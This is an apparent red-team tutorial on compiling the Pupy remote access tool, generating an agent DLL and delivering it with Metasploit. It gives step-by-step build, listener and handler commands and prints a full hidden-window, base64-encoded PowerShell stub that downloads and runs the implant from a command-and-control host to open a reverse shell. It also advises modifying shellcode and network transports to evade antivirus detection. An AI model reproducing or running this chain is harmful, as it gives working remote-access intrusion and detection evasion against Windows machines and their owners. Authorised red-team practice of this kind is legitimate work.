Introduction
Pupy, written by N1nj4sec, is an open source, cross-platform, modular Remote Administration Tool (RAT) / post exploitation toolkit written in Python. It bundles all dependencies into a single PE or reflective DLL for execution on Windows environments. By utilizing the DLL feature, we can easily plug it into Metasploit as an exploit payload (assuming it supports dllinject as a payload). This allows us to easily shift our agents as Red Teams in order to avoid detection due to reused Indicators of Compromise (IoC)s.
Installing Pupy
We'll go ahead and grab virtualenv, if it isn't already installed. From there we'll initialize all of the submodules, and get ready to recompile the payloads. There are precompiled payloads available, but these are more likely to set off Antivirus. It's generally best practice to compile everything yourself anyways, unless you're going for anti-attribution. Yes, Blue Teams like to write people off as script kiddies too.
Note: Don't underestimate your enemy based on initial analysis.
sudo apt-get install virtualenv libssl-dev python-dev git git clone https://github.com/n1nj4sec/pupy.git pupy cd pupy virtualenv ./ . ./bin/activate git submodule init git submodule update pip install -r pupy/requirements.txtIf you have issues with installing M2Crypto from pip, I'd recommend installing it on your distro and use that copy. Also, remove m2crypto line from pupy/requirements.txt
sudo apt-get install python-m2crypto ln -s /usr/lib/python2.7/dist-packages/M2Crypto lib/python2.7/site-packages/M2Crypto
Build binaries
As previously discussed, we will compile our own payload template binaries. If this is your first time running the buildenv.sh script, it will take a few minutes to grab all of the mingw packages required for cross-compiling the templates. Many of the shellcode stubs are taken directly from metasploit/meterpreter projects, and will cause AV to flag a lot of the template files. I highly recommend spending 30 minutes or so to tweak the techniques, as it will go a long way towards AV evasion. Unfortunately, there is no master config for network signatures, but all transport modules are written in Python which can be found in pupy/network/transports and are generally easy to modify.
The following commands will populate the templates located in pupy/payload_templates.
# If you don't currently have multiarch, install it now. sudo dpkg --add-architecture i386 && sudo apt-get update cd client/sources ./buildenv.sh ./build.sh
Generate Agent DLL
Metasploit currently requires us to generate x86 binaries, so we'll stick with that for generating our pupy dll. This will allow us to use any of Metasploit's dll stubs, or use it directly for throwing exploits. For the sake of demonstration, we will stick to executing a powershell one liner to retrieve and execute the DLL using metasploit's framework.
Generate the pupy agent using the following line. Replace the IP address with your C2 node IP or hostname.
cd ../../pupy ./pupygen.py -O windows -A x86 -f client -S --randomize-hash auto_proxy --transport http --host 192.168.1.138:8080
Start Pupy Listener
We still need to get the metasploit stub ready, but go ahead and start a pupysh session using the same transport and port from above.
./pupysh.py -t http --port 8080
Generate Agent Stub
Start up msfconsole, and generate the stub by using the following commands.
use payload/windows/dllinject/reverse_http set DLL ~/pupy/pupy/pupyx86.AUbLKU.dll set LHOST 192.168.1.138 set LPORT 9090 generate -t psh-cmd
If all went well, you should have something similar to the following.
powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARwA2AGcAQQAxAG8AQwBBADcAVgBXAGUAMgAvAGEAUwBCAEQALwBPADUASAA2AEgAYQB3AEsAeQBiAGIATwB3AFoARABRADkAQgBJAHAAMAB0AG0AOABiAEkAbwBKAHgARwBCAEMASwBEAG8AdAA5AHQAbwBzAHIAQgArADEAMQA0AEQAcAA5AGIAdgBmAEcATwB3ADIAVgBkAEsANwA5AHEAUwB6AHMATAB3ADcAcgA1ADMANQB6AFcATgB4ADAAOABCAG0ASgBBAHcANABqAE8ANAAxADcAdgBPAGIAOAA3AE0AaABpAHAASABQAEMAWgBWADkAaABDAFcAdQBrAHIAWABXADQAdABrAFoAawBDAHQARQA1AGUANAA0AFkAYQA1AEUAVQBTAHYAMABFAFEAawBXAHQANwBmAE4ATgBJADUAeAB3AEUANwA3AGEAaABjAHoASgBVAG0AdwB2ADYAUQBFAEoANABMAEkALwBjAFYATgBWAHoAagBHAEYALwBmAEwATgBiAFkAWgA5ADUAbQByAC8ARgBuAHQAMABuAEMASgBhAEMARwBXAE4AWgBHADkAdwB0AHkARgBFAGoAZwA1AHIAeAAvAGEASwBIAGUAbABhAGsAYQBVAE0ASQBIAC8AKwBKAEUAWAA1AHgAZgAxAFIAYgBYADkASwBVAFUAMABFAFgAZwB6AFMAeABqADIAcQB3ADYAbAB2AE0AaAA5AEUAZgBNAEQAeAAxAG0ARQBCAGQANABnAGQAaAB3AG0AbwBjAHUAcQBVAHgASgBjAFgAVgBZAG4AUQBZAEoAYwBQAEEAQgByAFcAMgB4AGcAdABnAHEAZABoAEIAYwBoAEIAdgBqAEYAbQBLAFYAeAB3AEUARQAwAHUAZgBxAEoASwBmAEMAdwBIAE0AYQBoAHIAVABoAE8AagBCAE8AUQByAGUAcgBCAE4AdAB4AGcAbwBSAEsAawBsAEUAcgBjAEgAOABLADgATwBQAHMAaABEAFIAagB4AE0AZgBBAFoAagBzAFAASQB4AFAARwBXADIARABpAHAAYQBpAGgAdwBLAEgANwBBADcAawBJAFkANABGADAAWgA4AHMAOABxAEMAYwArAFYAUQBHAHIASQBZAGwARwBDAEYATAB4AHcAMABnAGkAZABsAE8ASwBUAEgAaQArACsAZABEAE4AUABtAGcAaABQAGsAVABpAEkAKwBjAHUAYgA4AHoAZgBuAGIAcABsAGsATAA3AE8AcwA1ADAAbQBHADEAZABuADgAdQBNAGIAZwBtAGoAQQBNAEUAMwBLAFUAdQArAE4AcQBFAG0AZgBBAE0AWQBpAEYAYwBRAGIAYgB5AGoAaABPAHMAYgBqAGcANQBqAG4AZwA4ADgAVwBDAHEANgBSAFoATgBwAEIAKwByAEYAOAB2AGgAVQBIAFUAWgAwAEMAWQBXAHkARgB4AEYAcQBCAFEASgBLAEoAQwByAG4AUABxAGoAOAB1AHAAaABWADAAUwA0AEYAWQBXAEkASgAvAFkAWgBjAFUASQByADgARwBMAFgAWQBxAFAAOABWAFYATABzAFEARQA0AEoAUABBAEYAQQB6AHMAdABUAEwARwBIAFcAQQA2AFoAeABNADEAZgBxAHIAVgA5AHcAcgA3AHEAcQBpAG0AaABEAG8ANABWAEcAMQBLAFUAZwBGAGUAUQBQAGYARgA3AFoAMAA1AFoARQBIAGcAOQBNAEwAQQBQACsASgB6ADIAUABJAEQAdQBRAHAAMwBpAFUAcgBxAG8AegBhAHcAOABQAGQAKwBEAEUATgArAGsASwBFAGsAawBiAHAAaABDAG8AOQBnAFMAWgAyAEoARQBzAFMATgB4AFMAcABDAFEAZwBxAFcAawBMAEQAdwB1ACsAVwAvAHUARwBpAGwAbAB4AEUAWQBKAEsAOAAwAHQAeABCAE8ASwB4AFcAbgBOAE0ARQBoAFkAbgBOAHEAUQBNAEkAaAA4AGIARQBiAFkASgBvAGoAbQBRAEUAaQBjAFIAaAB5AHMAWgBpAGIAeAB5AGwAUAA1AFYAMgBGAG8ASQBrAHAASgA0AEkARwBsAEwAYQBRAEIASwBIAG4ANABKAHMAdgBMAEkAQQBZAEgAagB5AGsAWABxAHkAWgBtAHUAaAA5AFIANwBJAFAATQBzAFYAOAA3AEYASABuAFEAbgBVAFcAVgBIACsAcwBHAGUAZABqAGgAdgAvAGUAdgByAE8ASgBUAHkAZQBZADQAbABBAEEAOAA4AHcANgBTAGEAOQBLAFEAUwBaAHgARgBZAGcAWgBOAG4AMgBQAHEAcwAvADkAMgA5AFAATgBtAHYANgA0ADIAWQAxAHkAawBRAEMAaQA3AFkAcQA1AG0ATABLAC8AbAB5AGcAYgBsAGwAVgBqAGcAYwBZAHcAKwBaAGgAQgA1AEoAdwA1ADkARgBTAFgANAB1AG0ARwB5AEcASABBAFIAMwBzAHIAMwBwAEsAbgBBAE0AOQBNAEQAYQB0AGoAcQBoAHQAUwBWAEgAYQBuAHIAQgByAHcAVABjAHEAVwBIAHIAZgBmAE8AaAA5ADUAYQBrACsAUABXAGYAdQBVAHEAZQBxAEkAYgAyAHIAQQAxADAAcgBUAEcAdABtAGQAYQBEAFcAYQAyAGQAZgBaAGgAcQBEAE8AagAvAGIAaABlAG0ANAByADIATQBKAG0AeABKADEAMwBSAHgAcQBTADIAbQBUAFUATwBVAFkAOABjAHoATAA3AGkAegBQAGIAeQA5AFUARQA5ADcARwByAHEALwByAEQAMgBIAEgAZgBXAGMAbAAzAHYAdgBXAHMAKwAxAE4AOQAxAFMASAAvAGEASABLAG0AMQBTADkAUgB2AHQAZABQACsAVgBOADIAcAB0AFUAYgBTAEoAagB0AHQAUgBDAGEAagBUAGEALwBEAGwAagBPAEwAbwBvAGsAcgBlADQALwAxAEcAMABUADIALwBYAGgAdAAxAGMATwBsAGIAOQBXAFUANwB1AG8ASwBUAGQAOQBGAFYAbgBkAGwATwBOAGwATQBrADIAOABtACsAOAB2ADYAWQBEAHkAQgBGADcAVwBpAEsAVQBhAHUAWABMAGQAZwA3AFEASAB0AGsAbwB5ADAAbgBhAEoAYwA2ADYATQA4ADMASwAyADEAVgB2AHUAVABnADYAZABNAHUAcQB0AEgAOABpAFIAMwA1AFoAdABwAGIAMAA4AEgAbwBhAEwAMAB2AEYAVQBuAHQAKwBHAE0ATABYADgAZABXADIAYgBqAFAAZgBDAG0AeQBJAHYAYwB5AGQASAAyAFUAOQBnAGYAegBXAFoAWQBsAHEAMgBWAHIAZABZADcAUAB0AEgAYgBZAEIAZQAxAHgANwBzAEIAYgBzAG4AMQB5AFUAMgA5AE0AVgAzAHYARwBPAHAATgA1AFIAdgByADAANgBqAHIASwBXADAANABFAE0ARQA3AFUAdABRAHgANgBwAEQATgA1AEwAZABIAHUAZgA0AEUAdABoAHAAQgBZAEYAMQA2AGkAZwA2ADgAMwBHADQANwBRAHIAMwBHADkAbQBpADMAZABwAGcAbABtAG0ATABmAGQAMwBiAGEASQA1ADAAYQBBAC8AZABhAHUANQBKAGwAKwBmAGYAOQAvAFYAaABQAGoAZgBHAHMAMABWACsAMwA0AFcAcwAwAEYATwBYAHUANwBtADEAZQBHADEAQQBjAEYAWAB4ADQAbAB2AFUAZgBqAFcAZwBEAHgAYwBrAEsAVQBhAGcARwBtAEwANQBsADUAMwBYAEMAdQBGAE4ATQAxAEcARgBJAGMAZwAxAEIATwBGADYAZgBHAHgAdwBIAG0ATQBJAEYAQgBGAGQAVQBXAGMASQBLAHAAYQBHAGQAVAAvAFAAagA3AEkAVwBiADUARABUAGYARgA5AEMAQgBFADEAaABlAFgAYgA2ADYARQByAG0AdgBnAHUASwAzAE8AVgArAFMAYgBtACsAZgB3AEUAdABvAGkAdwAyAHEAOQBuAEgAZwBzAFoAVgBVADIAMQAvAFYAYQBqAEMAMABhAC8AdABHAEQAUwBMADgAKwBiAGkAYQBZAFoAUQBKAFkARQBqAEsAUgB6ADYAQQBjAHIASgBLAGoAMQBiAEYAdgBFADAAcQBTAC8AVAAvAEEAbABXADAANQBnAG8AKwB6AHIAOABCADkAWQAzADIARAA5AHkAZgBBAHEAOABtADUAYwBHACsASQBIADUAUAArAEMAVQBrAGYAegBuAHcASwBTAEkATQBKAEUAMgBZAEwAUgBTAGYANwByAFQAWAA0AHkAOQBxADQAdABtAEYAdgAwAFMAUQBjAGIAZAA0ADgAcgA5AGEAOQB5AG0ANwBHAE0AQwAvAGcATAA4AEIAbgBDAG4AbQBUAHQAQQBKAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
Set up Payload Delivery in Metasploit
Now, we need to setup a multi handler for delivering the DLL payload to the target. After the dll is delivered and executed, check back in your pupy tab for a shell.
use exploit/multi/handler set payload windows/dllinject/reverse_http set LHOST 192.168.1.138 set LPORT 9090 exploit
Get Shells
Execute the powershell stub that we generated above on a Windows machine, and enjoy your pupy shell delivered by Metasploit.
